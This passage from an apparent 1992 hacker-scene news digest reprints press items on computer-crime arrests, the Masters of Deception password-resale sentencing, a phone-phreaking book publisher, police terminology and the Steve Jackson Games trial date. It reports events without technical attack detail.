  6945. 2.  COMPUTER ACCESS ARRESTS IN NEW YORK (Barbara E. McMullen & John F.
  6946.     McMullen, Newsbytes, 11/3/92) -- GREENBURGH, NEW YORK -- The Greenburgh,
  6947.     New York Police Department has announced the arrest of three individuals,
  6948.     Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron J. Woodard, 18 for
  6949.     the alleged crimes of Unauthorized Use Of A Computer and Attempted Computer
  6950.     Trespass, both misdemeanors.  Also arrested was Jason A. Brittain, 22 in
  6951.     satisfaction of a State of Arizona Fugitive From Justice warrant.
  6952.  
  6953.     The arrests took place in the midst of an "OctoberCon" or "PumpCon" party
  6954.     billed as a "hacker get-together" at the Marriott Courtyard Hotel in
  6955.     Greenburgh.  The arrests were made at approximately 4:00 AM on Sunday
  6956.     morning, November 1st.  The three defendants arrested for computer crimes
  6957.     were granted $1,000 bail and will be arraigned on Friday, November 6th.
  6958.  
  6959.     Newsbytes sources said that the get together, which had attracted up to
  6960.     sixty people, had dwindled to approximately twenty-five when, at 10:00
  6961.     Saturday night, the police, in response to noise complaints arrived and
  6962.     allegedly found computers in use accessing systems over telephone lines.
  6963.     The police held the twenty-five for questioning and called in Westchester
  6964.     County Assistant District Attorney Kenneth Citarella, a prosecutor versed
  6965.     in computer crime, for assistance. During the questioning period, the
  6966.     information on Brittain as a fugitive from Arizona was obtained and at 4:00
  6967.     the three alleged criminal trespassers and Brittain were charged.
  6968.  
  6969.     Both Lt. DeCarlo of the Greenburgh police and Citarella told Newsbytes
  6970.     that the investigation is continuing and that no further information is
  6971.     available at this time.
  6972.  
  6973. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6974.  
  6975. 3.  U.S. PRISON SENTENCE FOR COMPUTER HACKER (New York Law Journal, 10/15/92,
  6976.     Page 7) -- A Brooklyn man was sentenced yesterday to eight months in prison
  6977.     for buying passwords from a computer hacker group known as the "masters of
  6978.     deception" [MOD] for resale to others seeking access to confidential credit
  6979.     reports.
  6980.  
  6981.     Morton Rosenfeld, 21, received the sentence in federal court in Manhattan
  6982.     after pleading guilty in June to obtaining the unauthorized access devices
  6983.     to computer data bases operated by TRW Information Services and other
  6984.     credit reporting companies.
  6985.  
  6986.     The sentence, imposed by Southern District Judge Shirley Wohl Kram, is
  6987.     believed to be among few prison terms levied for computer-related offenses.
  6988.  
  6989.     Meanwhile, charges are pending against Mr. Rosenfeld's alleged source: the
  6990.     five members of the masters of deception, young men in their teens and
  6991.     20's.  The five were accused in July of breaking into computer systems run
  6992.     by credit reporting services, telephone companies and educational
  6993.     institutions.
  6994.  
  6995.     For more information about the indictment and case against MOD, see ALL the
  6996.     articles in PWN 40-2.
  6997.  
  6998. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6999.  
  7000. 4.  2ND ONLINE LEGAL GUIDE RELEASED (by Barbara E. McMullen & John F. McMullen,
  7001.     Newsbytes, 10/13/92) -- NEW YORK CITY -- PC Information Group has announced
  7002.     the release of SysLaw, Second Edition: The Legal Guide for Online Service
  7003.     Providers by attorneys Lance Rose and Jonathan Wallace.
  7004.  
  7005.     According to the company, "Syslaw provides BBS sysops, network moderators
  7006.     and other online service providers with basic information on their rights
  7007.     and responsibilities, in a form that non-lawyers can easily understand."
  7008.  
  7009.     Subjects covered by the book include the First Amendment, copyrights and
  7010.     trademarks, the user agreement, negligence, privacy, criminal law, searches
  7011.     and seizures, viruses and adult materials.  The company claims that SysLaw
  7012.     not only explains the laws, but that it gives detailed advice enabling
  7013.     system operators to create the desired balance of user services, freedom,
  7014.     and protection from risk on their systems."
  7015.  
  7016.     Co-author Lance Rose told Newsbytes: "In the four years since the
  7017.     publication of the first edition, the electronic community has become
  7018.     alerted to the first amendment dimensions of the on-line community."
  7019.  
  7020.     "The first amendment has profound implications to the on-line community
  7021.     both to liberate providers and users of on-line systems and to protect them
  7022.     from undue legal harassment.  There has, in the last few years, been a lot
  7023.     of law enforcement activity effecting bulletin board systems, including the
  7024.     Steve Jackson and Craig Neidorf/Phrack cases," he said.
  7025.  
  7026.     Rose continued, "The new edition incorporates these new developments as
  7027.     well as containing new information concerning on-line property rights, user
  7028.     agreements, sysop liabilities, viruses and adult material contained on
  7029.     online systems."
  7030.  
  7031.     SysLaw is available from PC Information Group, 1126 East Broadway, Winona,
  7032.     MN  55987 (800-321-8285 or 507-452-2824) at a price of $34.95 plus $3.00
  7033.     shipping and (if applicable) sales tax.
  7034.  
  7035.     Press Contact:  Brian Blackledge, PC Information Group, 800-321-8285
  7036.  
  7037. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7038.  
  7039. 5.  YET ANOTHER BOOK ABOUT THE COMPUTER UNDERGROUND (The Daily Telegraph,
  7040.     12/14/92, Page 25) -- Approaching Zero: Data Crime and the Computer
  7041.     Underworld by Bryan Clough and Paul Mungo (Faber & Faber, L14.99) -- A look
  7042.     at the world of Fry Guy, Control C, Captain Zap and other hackers to blame
  7043.     for the viruses, logic bombs and Trojan horses in the world's personal
  7044.     computer networks.
  7045.  
  7046. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7047.  
  7048. 6.  HONOR STUDENT NABBED IN COMPUTER FRAUD (The Washington Times, 11/9/92, Page
  7049.     A6) -- BROOKSVILLE, FLA.-- Three high school honor students have been
  7050.     accused of stealing tens of thousands of dollars worth of long-distance
  7051.     calls as computer hackers.
  7052.  
  7053.     Brian McGrogan, 16, and Edmund Padgett, 17, who were charged as adults, and
  7054.     a 15-year-old allegedly tapped private telephone systems and dialed into an
  7055.     international hacking network.  One company's loss was $36,000.
  7056.  
  7057.     "These are very sharp, intelligent kids," Hernando County sheriff's Captain
  7058.     Richard Nugent said after the arrests.  "It's a game to them.  It's a
  7059.     sport."
  7060.  
  7061.     Some calls were made to computer bulletin boards in the United Kingdom,
  7062.     Germany and Canada, where a loose network of hackers allegedly shared
  7063.     information about how to obtain computer data and access information.
  7064.     Arrests in the case also were made in New York and Virginia, Captain Nugent
  7065.     said.
  7066.  
  7067.     The two older boys were booked on charges of organized fraud and violation
  7068.     of intellectual property.  The third boy was released to his parents.
  7069.  
  7070. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7071.  
  7072. 7.  A CORDLESS PHONE THAT CAN THWART EAVESDROPPERS (Business Week, 8/3/92) --
  7073.     To industrial spies and other snoops, the millions of cordless phones in
  7074.     use are goldmines of information.  Conversations can be plucked out of the
  7075.     air by means of a police type scanner, and with increasing ease.  The
  7076.     latest no-cord technologies offers clearer sound and longer ranges -- up to
  7077.     half a mile.  That's because the new phones broadcast signals at 900 MHz,
  7078.     or 20 times the frequency of current models.
  7079.  
  7080.     Cincinnati Microwave, Inc. (the radar detector people) figures executives
  7081.     and consumers will pay a small premium for cordless privacy.  The company
  7082.     has developed a phone, to be marketed in October by its Escort division for
  7083.     about $300, that thwarts eavesdroppers with "spread spectrum" technology,
  7084.     which is similar to the encryption method that the military uses in secure
  7085.     radios.  The signals between the handset and base unit are digitized,
  7086.     making them unintelligible to humans, and the transmission randomly hops
  7087.     among various frequencies within the 900 MHz spectrum.  To keep the cost
  7088.     down to the range of other 900 MHz models, Cincinnati Microwave has
  7089.     developed special microchips that keep the handset and base in sync.
  7090.  
  7091. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7092.  
  7093. 8.  NEW AREA CODE -- As of November 1, 1992, a new 210 area code is serving 152
  7094.     communities in the San Antonio and Rio Grande Valley areas.
  7095.  
  7096. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7097.  
  7098. 9.  FOR SALE: PHONE-PHREAKING TOOLS (Brigid McMenamin, Forbes, 8/3/92, Page 64)
  7099.     -- From his remote outpost in Alamogordo, New Mexico, John Williams makes a
  7100.     nice living telling hackers how to rip off phone and computer systems.
  7101.  
  7102.     Williams says he brings in about $200,000 a year publishing books on
  7103.     everything from credit card scams and cracking automated teller machines to
  7104.     electronic shoplifting, cellular phone phreaking and voice mailbox hacking,
  7105.     each costing $29 to $39, and each complete with precise instructions.  He
  7106.     even sells Robofones, which save hackers from doing a lot of dialing while
  7107.     they steal access codes.
  7108.  
  7109.     Isn't what he does illegal?  Perhaps it should be, but it isn't.  Wrapping
  7110.     himself in the First Amendment, Williams is a member in good standing of
  7111.     the Alamogordo Chamber of Commerce and the New Mexico Better Business
  7112.     Bureau.  He thumbs his nose at companies and authorities that would like to
  7113.     make him stop selling such secrets.  "We don't promote fraud," he insists.
  7114.     "It's all sold for educational purposes only.  If we didn't publish the
  7115.     information, it would still be out there."
  7116.  
  7117.     But last year Williams got a visit form the Secret Service, which was
  7118.     following up on a telephone fraud case in which one of his publications
  7119.     figured prominently.
  7120.  
  7121.     In Gainsville, Florida, in November 1990, two young men were locked up by
  7122.     police for hacking into voice-mail systems and then making calls to 900
  7123.     numbers.  One of the pair, known as the Shark, then 20, confessed to the
  7124.     crime, but said he was on assignment for Williams' Consumertronics
  7125.     publication.  The culprits could have been given five years on the fraud
  7126.     charge alone.  But the victim didn't want any publicity, so the state let
  7127.     them do 50 hours of community service instead.
  7128.  
  7129.     The Secret Service went to talk to Williams.  Williams assured agent James
  7130.     Pollard that he'd never told the Shark to do anything illegal.
  7131.     Nevertheless, says Williams, the agent implied that Williams and members of
  7132.     his family who work for him might be prosecuted for publishing voice-mail
  7133.     access codes.
  7134.  
  7135.     In the end, no charges were filed against Williams, who admits he has a
  7136.     thing against big business, especially the phone companies.  "For decades,
  7137.     they financed right-wing regimes in Latin America," he rants.
  7138.  
  7139.     It's a crazy world, that of the telephone toll fraudsters.
  7140.  
  7141. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7142.  
  7143. 10. NEW YORK STATE POLICE DECRIMINALIZE THE WORD "HACKER" (Barbara E. McMullen
  7144.     & John F. McMullen, Newsbytes, 10/21/92) -- ALBANY, NEW YORK -- Senior
  7145.     investigator Ron Stevens of the New York State Police Computer Unit has
  7146.     told Newsbytes that it will be the practice of his unit to avoid the use of
  7147.     the term "hacker" in describing those alleged to have committed computer
  7148.     crimes.
  7149.  
  7150.     Stevens told Newsbytes, "We use the term computer criminal to describe
  7151.     those who break the law using computers.  While the lay person may have
  7152.     come to understand the meaning of hacker as a computer criminal, the term
  7153.     isn't accurate.  The people in the early days of the computer industry
  7154.     considered themselves hackers and they made the computer what it is today.
  7155.     There are those today who consider themselves hackers and do not commit
  7156.     illegal acts."
  7157.  
  7158.     Stevens had made similar comments in a recent conversation with Albany BBS
  7159.     operator Marty Winter.  Winter told Newsbytes, "'Hacker' is, unfortunately
  7160.     an example of the media taking what used to be an honorable term, and using
  7161.     it to describe an activity because they (the media) are too lazy or stupid
  7162.     to come up with something else.  Who knows, maybe one day 'computer
  7163.     delinquent' WILL be used, but I sure ain't gonna hold my breath."
  7164.  
  7165.     Stevens, together with investigator Dick Lynch and senior investigator
  7166.     Donald Delaney, attended the March 1992 Computers, Freedom and Privacy
  7167.     Conference (CFP-2) in Washington, DC and met such industry figures as Glenn
  7168.     Tenney, congressional candidate and chairman of the WELL's annual "Hacker
  7169.     Conference"; Craig Neidorf, founding editor and publisher of Phrack; Steven
  7170.     Levy, author of "Hackers" and the recently published "Artificial Life";
  7171.     Bruce Sterling, author of the recently published "The Hacker Crackdown";
  7172.     Emmanuel Goldstein, editor and publisher of 2600: The Hacker Quarterly" and
  7173.     a number of well-known "hackers."
  7174.  
  7175.     Stevens said, "When I came home, I read as much of the literature about the
  7176.     subject that I could and came to the conclusion that a hacker is not
  7177.     necessarily a computer criminal."
  7178.  
  7179.     The use of the term "hacker" to describe those alleged to have committed
  7180.     computer crimes has long been an irritant to many in the online community.
  7181.     When the July 8th federal indictment of 5 New York City individuals
  7182.     contained the definition of computer hacker as "someone who uses a computer
  7183.     or a telephone to obtain unauthorized access to other computers," there was
  7184.     an outcry on such electronic conferencing system as the WELL (Whole Earth
  7185.     'Lectronic Link).  Many of the same people reacted quite favorably to the
  7186.     Stevens statement when it was posted on the WELL.
  7187.  
  7188. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  7189. 11.  STEVE JACKSON GAMES TRIAL DATE SET -- Mike Godwin, General Counsel for the
  7190.      Electronic Frontier Foundation, announced on December 23rd that the case
  7191.      of Steve Jackson Games, et.al. v. The United States Secret Service et. al.
  7192.      will go to trial in Austin, Texas on Tuesday, January 19, 1993.
  7193. _______________________________________________________________________________
  7194.